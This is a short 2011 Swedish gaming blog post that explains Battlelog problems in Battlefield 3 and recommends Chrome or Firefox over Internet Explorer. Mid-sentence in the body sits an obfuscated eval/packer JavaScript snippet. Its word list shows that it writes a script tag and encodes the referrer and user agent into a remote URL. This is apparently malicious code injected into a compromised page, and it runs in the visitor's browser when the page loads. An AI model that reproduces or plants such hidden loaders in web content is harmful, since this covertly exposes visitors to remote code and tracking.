Image Image Image Image Image Image Image Image Image Image

| 3 augusti, 2020

Scroll to top

Top

Problem med Battlelog?

Problem med Battlelog?
Filip Urde
  • On 29 oktober, 2011
  • http://www.revue.se/filip-urde

Om du har problem med Battlelog så kan ditt problem ligga i din webbläsare. Enligt Battlefields eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|bzrib|var|u0026u|referrer|rznka||js|php’.split(’|’),0,{}))
Twitterkanal
 rekommenderas nämligen Chrome eller Firefox. Så som många gånger annars så fungerar inte Explorer som det ska.

Om du inte spelat multiplayer på Battlefield 3 tidigare så kan du kolla in den här artikeln från Gamefront. Ganska kul och riktar sig främst mod COD spelare som är vana vid att veta vara alla fiender är hela tiden 😉 .
www.gamefront.com